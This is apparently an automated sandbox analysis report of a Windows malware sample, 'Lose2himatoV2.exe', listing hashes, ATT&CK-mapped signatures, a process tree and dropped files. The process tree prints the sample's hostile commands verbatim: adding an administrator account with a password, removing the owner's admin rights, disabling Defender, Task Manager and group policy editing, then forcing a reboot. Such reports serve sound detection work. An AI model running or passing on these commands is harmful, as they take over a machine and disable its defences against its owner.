Analysis

  • max time kernel
    65s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 17:20

Errors

Reason
Machine shutdown

General

  • Target

    Lose2himatoV2.exe

  • Size

    138.5MB

  • MD5

    b13b58171063faf469d7cffd178644a6

  • SHA1

    0cc178b5db25710be4181e0f15b70ca8c3049ef2

  • SHA256

    974cb763c5670a8c187c5e7108964741b8c59590ac35f3bdccb2e069e2ec7506

  • SHA512

    511d96d59fc5646aead6f0bf16ecbe9f9e1ab60e05954b02d2b53c7686df2ccfe85374388fc5aece04e50bd37ff3411319c7107d52cc33c3af819fb47ab570e3

  • SSDEEP

    786432:Y93oFjO6NbbB6uTE/kbsV0jmB/gWD4otJ0njnEMIQAhpLoMS/QVQfmLh0VPdTtLH:Y9SjOsbbUng40ihpEX/QVQfmLmxHXutU

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Disables Task Manager via registry modification
  • Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Detected potential entity reuse from brand PAYPAL.
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe
    "C:\Users\Admin\AppData\Local\Temp\Lose2himatoV2.exe"
    1⤵
    • Checks computer location settings
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4312
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user Lose2himato /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3420
      • C:\Windows\SysWOW64\net.exe
        net user Lose2himato /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Lose2himato /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3088
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user Lose2himato dumbass
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Windows\SysWOW64\net.exe
        net user Lose2himato dumbass
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1432
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Lose2himato dumbass
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3304
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "Lose2himato" /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1188
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "Lose2himato" /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "Lose2himato" /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2324
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
      2⤵
      • Indicator Removal: Network Share Connection Removal
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4780
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "Admin" /delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4432
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3548
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3024
    • C:\Windows\SysWOW64\explorer.exe
      "explorer.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      PID:1500
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4496
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:336
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:628
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3340
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3848
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2536
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
        3⤵
          PID:1432
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffd66c546f8,0x7ffd66c54708,0x7ffd66c54718
            4⤵
              PID:1392
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,14347223979453200180,15108208608300582119,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
              4⤵
                PID:2040
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,14347223979453200180,15108208608300582119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:5000
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start https://discord.gg/UkEYppsAck
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4756
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/UkEYppsAck
              3⤵
                PID:1928
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd66c546f8,0x7ffd66c54708,0x7ffd66c54718
                  4⤵
                    PID:4416
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6955685112923931785,11760352716137087246,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
                    4⤵
                      PID:3452
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,6955685112923931785,11760352716137087246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4812
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c start https://www.paypal.com/paypalme/himato666
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:5016
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/paypalme/himato666
                    3⤵
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2324
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd66c546f8,0x7ffd66c54708,0x7ffd66c54718
                      4⤵
                        PID:2864
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                        4⤵
                          PID:1224
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3664
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
                          4⤵
                            PID:4932
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                            4⤵
                              PID:5128
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                              4⤵
                                PID:5148
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
                                4⤵
                                  PID:5424
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
                                  4⤵
                                    PID:5620
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
                                    4⤵
                                      PID:5980
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
                                      4⤵
                                        PID:6080
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
                                        4⤵
                                          PID:5496
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                                          4⤵
                                            PID:5612
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5828 /prefetch:8
                                            4⤵
                                              PID:5900
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3436 /prefetch:8
                                              4⤵
                                              • Modifies registry class
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2724
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
                                              4⤵
                                                PID:644
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6884 /prefetch:8
                                                4⤵
                                                  PID:4252
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6884 /prefetch:8
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5416
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
                                                  4⤵
                                                    PID:4276
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                                                    4⤵
                                                      PID:5128
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
                                                      4⤵
                                                        PID:5544
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1980,13208710438855490269,7405055159242769538,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
                                                        4⤵
                                                          PID:5552
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c shutdown /r
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:744
                                                      • C:\Windows\SysWOW64\shutdown.exe
                                                        shutdown /r
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5648
                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                    1⤵
                                                      PID:5220
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:5588
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault4805fd20h6131h4867h8dfdh8e54af7acbaf
                                                        1⤵
                                                          PID:5488
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd66c546f8,0x7ffd66c54708,0x7ffd66c54718
                                                            2⤵
                                                              PID:1944
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,8219024023857383353,13004920748562223219,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
                                                              2⤵
                                                                PID:5264
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,8219024023857383353,13004920748562223219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5280
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,8219024023857383353,13004920748562223219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8
                                                                2⤵
                                                                  PID:5796
                                                              • C:\Windows\system32\LogonUI.exe
                                                                "LogonUI.exe" /flags:0x4 /state0:0xa38b0055 /state1:0x41c64e6d
                                                                1⤵
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2908

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                d22073dea53e79d9b824f27ac5e9813e

                                                                SHA1

                                                                6d8a7281241248431a1571e6ddc55798b01fa961

                                                                SHA256

                                                                86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                                SHA512

                                                                97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                4c114215a4e5282ee04a1a3a6f83d9b4

                                                                SHA1

                                                                f9546402f2b2c635ff5d50d797bc198fd235db2a

                                                                SHA256

                                                                736140c6fdb78d94772e95cbabf64dd7c6d435736c50a285625399f448c8edf6

                                                                SHA512

                                                                d74d25eacbad29a44c7479d43c101a03b6cb3e98ff14a3a8885c0c87b84a34f514a6b7cf2b74e1fd36e9109c394db3edfd935556ad2608e1e881e7721d8671d6

                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                Filesize

                                                                152B

                                                                MD5

                                                                bffcefacce25cd03f3d5c9446ddb903d

                                                                SHA1

                                                                8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                                SHA256

                                                                23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                                SHA512

                                                                761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

